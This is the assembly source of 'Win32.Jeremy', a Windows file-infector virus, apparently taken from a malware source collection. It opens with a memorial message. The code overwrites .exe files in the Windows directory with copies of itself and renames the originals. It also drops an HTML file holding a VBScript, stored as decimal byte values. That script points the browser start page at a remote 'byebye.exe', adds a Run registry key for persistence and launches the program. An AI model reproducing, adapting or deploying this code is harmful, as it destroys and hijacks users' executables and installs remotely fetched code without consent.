MalwareSourceCode/Win32/Infector/Win32.Jeremy.Memorial.asm

355 lines
11 KiB
NASM

Contribution - Win32.Jeremy [by Necronomikon]
;********************************
;******** Win32.Jeremy **********
;(c)by Necronomikon /ZeroGravity
;********************************
;Written for one of my real friends who,died through an car accident..... :(
;
;In memories for:
;-----------------
;Jeremy Stephan Garcia
;* 17.05.1984
;+ 08.04.2004
.586p
.model flat
JUMPS
.data
handle1 db 50 dup(0)
handle2 db 50 dup(0)
maska db '*.exe',0
zgrext db 'dat.',0
handle_ dd 0
_handle dd 0
filedta:
FileAttributes dd 0
CreationTime db 8 dup(0)
LastAccessTime db 8 dup(0)
LastWriteTime db 8 dup(0)
nFileSizeHigh dd 0
nFileSizeLow dd 0
dwReserved0 dd 0
dwReserved1 dd 0
nFileName db 50 dup('N')
nAltFileName db 14 dup(0)
newfilename db 50 dup(0)
path2 db 25 dup(0)
path3 db 260 dup(0)
szTitle db "*** Win32.Jeremy ***",0
szMessage db "*****************************************************************************",13,10
db "**Written for one of my friends,who died through an car accident**",13,10
db "*****************************************************************************",13,10
db "** (c) by Necronomikon / ZeroGravity **",13,10
db "*****************************************************************************",0
;dropme
htm_handle dd ?
htmdropper db '\jeremy.htm', 0
szhtm db 220 dup (0)
htm_ db 60,104,116,109,108,62,13,10,13,10,60,98,111,100,121,32
db 98,103,99,111,108,111,114,61,34,98,108,97,99,107,34,32
db 108,105,110,107,61,34,35,48,48,48,48,48,48,34,32,118
db 108,105,110,107,61,34,35,48,48,48,48,48,48,34,32,97
db 108,105,110,107,61,34,35,102,102,48,48,48,48,34,32,116
db 101,120,116,61,108,105,109,101,62,13,10,60,99,101,110,116
db 101,114,62,13,10,60,98,114,62,13,10,60,102,111,110,116
db 32,115,105,122,101,61,43,50,62,60,117,62,60,98,62,60
db 102,111,110,116,32,99,111,108,111,114,61,34,35,48,48,56
db 48,70,70,34,62,87,60,47,102,111,110,116,62,60,102,111
db 110,116,32,99,111,108,111,114,61,34,35,48,48,56,67,69
db 56,34,62,105,60,47,102,111,110,116,62,60,102,111,110,116
db 32,99,111,108,111,114,61,34,35,48,48,57,55,68,49,34
db 62,110,60,47,102,111,110,116,62,60,102,111,110,116,32,99
db 111,108,111,114,61,34,35,48,48,65,51,66,57,34,62,51
db 60,47,102,111,110,116,62,60,102,111,110,116,32,99,111,108
db 111,114,61,34,35,48,48,65,69,65,50,34,62,50,60,47
db 102,111,110,116,62,60,102,111,110,116,32,99,111,108,111,114
db 61,34,35,48,48,66,65,56,66,34,62,46,60,47,102,111
db 110,116,62,60,102,111,110,116,32,99,111,108,111,114,61,34
db 35,48,48,67,53,55,52,34,62,74,60,47,102,111,110,116
db 62,60,102,111,110,116,32,99,111,108,111,114,61,34,35,48
db 48,68,49,53,68,34,62,101,60,47,102,111,110,116,62,60
db 102,111,110,116,32,99,111,108,111,114,61,34,35,48,48,68
db 67,52,54,34,62,114,60,47,102,111,110,116,62,60,102,111
db 110,116,32,99,111,108,111,114,61,34,35,48,48,69,56,50
db 69,34,62,101,60,47,102,111,110,116,62,60,102,111,110,116
db 32,99,111,108,111,114,61,34,35,48,48,70,51,49,55,34
db 62,109,60,47,102,111,110,116,62,60,102,111,110,116,32,99
db 111,108,111,114,61,34,35,48,48,70,70,48,48,34,62,121
db 60,47,102,111,110,116,62,60,47,102,111,110,116,62,60,47
db 117,62,60,98,114,62,60,98,114,62,60,98,114,62,13,10
db 60,116,105,116,108,101,62,46,46,46,97,110,100,32,111,110
db 99,101,32,97,103,97,105,110,32,111,110,101,32,111,102,32
db 109,121,32,112,97,108,115,46,46,46,33,63,60,47,116,105
db 116,108,101,62,13,10,60,102,111,110,116,32,115,105,122,101
db 61,45,49,32,99,111,108,111,114,61,119,104,105,116,101,62
db 43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,60
db 98,114,62,60,98,114,62,13,10,87,114,105,116,116,101,110
db 32,102,111,114,32,111,110,101,32,111,102,32,109,121,32,102
db 114,105,101,110,100,115,32,119,104,111,32,100,105,101,100,32
db 116,104,114,111,117,103,104,32,97,110,32,99,97,114,32,97
db 99,99,105,100,101,110,116,13,10,60,98,114,62,60,98,114
db 62,13,10,40,99,41,111,100,101,100,32,105,110,32,71,101
db 114,109,97,110,89,32,50,111,111,52,60,98,114,62,60,98
db 114,62,98,121,32,78,101,99,114,111,110,111,109,105,107,111
db 110,47,90,101,114,111,71,114,97,118,105,116,121,60,98,114
db 62,13,10,60,98,114,62,60,98,114,62,60,47,102,111,110
db 116,62,13,10,60,83,99,114,105,112,116,32,76,97,110,103
db 117,97,103,101,61,118,98,115,62,13,10,114,101,109,32,119
db 105,110,51,50,46,106,101,114,101,109,121,13,10,114,101,109
db 32,40,99,41,32,98,121,32,78,101,99,114,111,110,111,109
db 105,107,111,110,47,90,71,13,10,83,101,116,32,100,111,119
db 110,108,111,97,100,101,114,32,61,32,67,114,101,97,116,101
db 79,98,106,101,99,116,40,34,87,83,99,114,105,112,116,46
db 83,104,101,108,108,34,41,13,10,100,111,119,110,108,111,97
db 100,101,114,46,114,101,103,119,114,105,116,101,32,34,72,75
db 67,85,92,115,111,102,116,119,97,114,101,92,119,105,110,51
db 50,74,101,114,101,109,121,92,34,44,32,34,40,99,41,98
db 121,32,78,101,99,114,111,110,111,109,105,107,111,110,47,90
db 101,114,111,71,114,97,118,105,116,121,34,13,10,83,101,116
db 32,74,101,114,101,109,121,61,32,67,114,101,97,116,101,111
db 98,106,101,99,116,40,34,115,99,114,105,112,116,105,110,103
db 46,102,105,108,101,115,121,115,116,101,109,111,98,106,101,99
db 116,34,41,13,10,74,101,114,101,109,121,46,99,111,112,121
db 102,105,108,101,32,119,115,99,114,105,112,116,46,115,99,114
db 105,112,116,102,117,108,108,110,97,109,101,44,74,101,114,101
db 109,121,46,71,101,116,83,112,101,99,105,97,108,70,111,108
db 100,101,114,40,48,41,38,95,13,10,34,92,106,101,114,101
db 109,121,46,118,98,115,34,13,10,90,71,114,97,118,105,116
db 121,61,32,34,34,13,10,90,71,114,97,118,105,116,121,61
db 32,100,111,119,110,108,111,97,100,101,114,46,114,101,103,114
db 101,97,100,40,34,72,75,67,85,92,83,111,102,116,119,97
db 114,101,92,77,105,99,114,111,115,111,102,116,92,73,110,116
db 101,114,110,101,116,32,69,120,112,108,111,114,101,114,92,68
db 111,119,110,108,111,97,100,32,68,105,114,101,99,116,111,114
db 121,34,41,13,10,73,102,32,40,90,71,114,97,118,105,116
db 121,61,32,34,34,41,32,84,104,101,110,13,10,90,71,114
db 97,118,105,116,121,32,61,32,34,99,58,34,13,10,69,110
db 100,32,73,102,13,10,73,102,32,82,105,103,104,116,40,90
db 71,114,97,118,105,116,121,44,32,49,41,32,61,32,34,32
db 92,32,34,32,84,104,101,110,32,90,71,114,97,118,105,116
db 121,32,61,32,77,105,100,40,90,71,114,97,118,105,116,121
db 44,32,49,44,32,76,101,110,40,90,71,114,97,118,105,116
db 121,41,32,45,32,49,41,13,10,73,102,32,78,111,116,32
db 40,74,101,114,101,109,121,46,102,105,108,101,101,120,105,115
db 116,115,40,74,101,114,101,109,121,46,103,101,116,115,112,101
db 99,105,97,108,102,111,108,100,101,114,40,48,41,32,38,32
db 34,92,98,121,101,98,121,101,46,101,120,101,34,41,41,32
db 84,104,101,110,13,10,73,102,32,78,111,116,32,40,74,101
db 114,101,109,121,46,102,105,108,101,101,120,105,115,116,115,40
db 90,71,114,97,118,105,116,121,32,38,32,34,92,98,121,101
db 98,121,101,46,101,120,101,34,41,41,32,84,104,101,110,13
db 10,100,111,119,110,108,111,97,100,101,114,46,114,101,103,119
db 114,105,116,101,32,34,72,75,67,85,92,83,111,102,116,119
db 97,114,101,92,77,105,99,114,111,115,111,102,116,92,73,110
db 116,101,114,110,101,116,32,69,120,112,108,111,114,101,114,92
db 77,97,105,110,92,83,116,97,114,116,32,80,97,103,101,34
db 44,95,13,10,34,104,116,116,112,58,47,47,119,105,110,51
db 50,106,101,114,101,109,121,46,116,114,105,112,111,100,46,99
db 111,109,47,98,121,101,98,121,101,46,101,120,101,34,13,10
db 100,111,119,110,108,111,97,100,101,114,46,114,101,103,119,114
db 105,116,101,32,34,72,75,69,89,95,67,85,82,82,69,78
db 84,95,85,83,69,82,92,83,111,102,116,119,97,114,101,92
db 77,105,99,114,111,115,111,102,116,92,87,105,110,100,111,119
db 115,92,67,117,114,114,101,110,116,86,101,114,115,105,111,110
db 92,82,85,78,34,44,95,13,10,74,101,114,101,109,121,46
db 103,101,116,115,112,101,99,105,97,108,102,111,108,100,101,114
db 40,48,41,32,38,32,34,92,98,121,101,98,121,101,46,101
db 120,101,34,13,10,69,108,115,101,13,10,100,111,119,110,108
db 111,97,100,101,114,46,114,101,103,119,114,105,116,101,32,34
db 72,75,69,89,95,67,85,82,82,69,78,84,95,85,83,69
db 82,92,83,111,102,116,119,97,114,101,92,77,105,99,114,111
db 115,111,102,116,92,73,110,116,101,114,110,101,116,32,69,120
db 112,108,111,114,101,114,92,77,97,105,110,92,83,116,97,114
db 116,32,80,97,103,101,34,44,95,13,10,34,97,98,111,117
db 116,58,98,108,97,110,107,34,13,10,74,101,114,101,109,121
db 46,99,111,112,121,102,105,108,101,32,90,71,114,97,118,105
db 116,121,32,38,32,34,92,98,121,101,98,121,101,46,101,120
db 101,34,44,95,13,10,74,101,114,101,109,121,46,103,101,116
db 115,112,101,99,105,97,108,102,111,108,100,101,114,40,48,41
db 32,38,32,34,92,98,121,101,98,121,101,46,101,120,101,34
db 13,10,100,111,119,110,108,111,97,100,101,114,46,114,117,110
db 32,74,101,114,101,109,121,46,103,101,116,115,112,101,99,105
db 97,108,102,111,108,100,101,114,40,48,41,32,38,32,34,92
db 98,121,101,98,121,101,46,101,120,101,34,44,32,49,44,32
db 70,97,108,115,101,13,10,101,110,100,32,105,102,13,10,60
db 47,115,99,114,105,112,116,62,13,10,60,47,66,79,68,89
db 62,13,10,60,47,104,116,109,108,62,13,10,13,10,0
script_size2 equ $-htm_
_off_ equ 2722d
include useful.inc
.code
api macro a
extrn a:proc
call a
endm
jeremy:
push 00000000h ; Parameters for MessageBoxA
push offset szTitle
push offset szMessage
push 00000000h
api MessageBoxA
real:
push 00000001
push offset nFileName
api WinExec
push offset path3
push 260
api GetCurrentDirectoryA
push 25
push offset path2
api GetWindowsDirectoryA
push offset path2
api SetCurrentDirectoryA
push offset handle1
api GetModuleHandleA
push 50
push offset handle2
push eax
api GetModuleFileNameA
push offset filedta
push offset maska
api FindFirstFileA
mov dword ptr [handle_],eax
cmp eax, 0
je @@dropfile ; <-------------
check:
mov bx, word ptr[nFileName]
cmp bx, 'J'
je nextfile
cmp bx, 'E'
je nextfile
cmp bx, 'R'
je nextfile
cmp bx, 'E'
je nextfile
cmp bx, 'M'
je nextfile
cmp bx, 'Y'
je nextfile
lea esi, [nFileName]
lea edi, [newfilename]
stowit:
lodsb
cmp al, '.'
je addext
stosb
jmp stowit
addext:
stosb
lea esi, [zgrext]
movsw
movsw
push 0
push offset newfilename
push offset nFileName
api MoveFileA
;api lstrcat
push 0
push offset nFileName
push offset handle2
api CopyFileA
push 2
push offset nFileName
api CreateFileA
mov dword ptr [_handle],eax
push dword 0
push 0
push _off_
push eax
api SetFilePointer
mov eax, dword ptr [_handle]
push 50
push offset newfilename
push eax
api WriteFile
push eax
api _lclose
jmp nextfile
je real
@@dropfile:
push 50
push offset szhtm
api GetWindowsDirectoryA
push offset htmdropper
push offset szhtm
api lstrcat
push 0
push offset szhtm
api _lcreat
mov [htm_handle],eax
push script_size2
push offset htm_
push [htm_handle]
api _lwrite
push [htm_handle]
api _lclose
push 0
push edi
api WinExec
nextfile:
push offset filedta
mov eax, dword ptr [handle_]
push eax
api FindNextFileA
cmp eax, 0
je @@dropfile ; <-----------------
jmp check
bailout:
push 0
api ExitProcess
end jeremy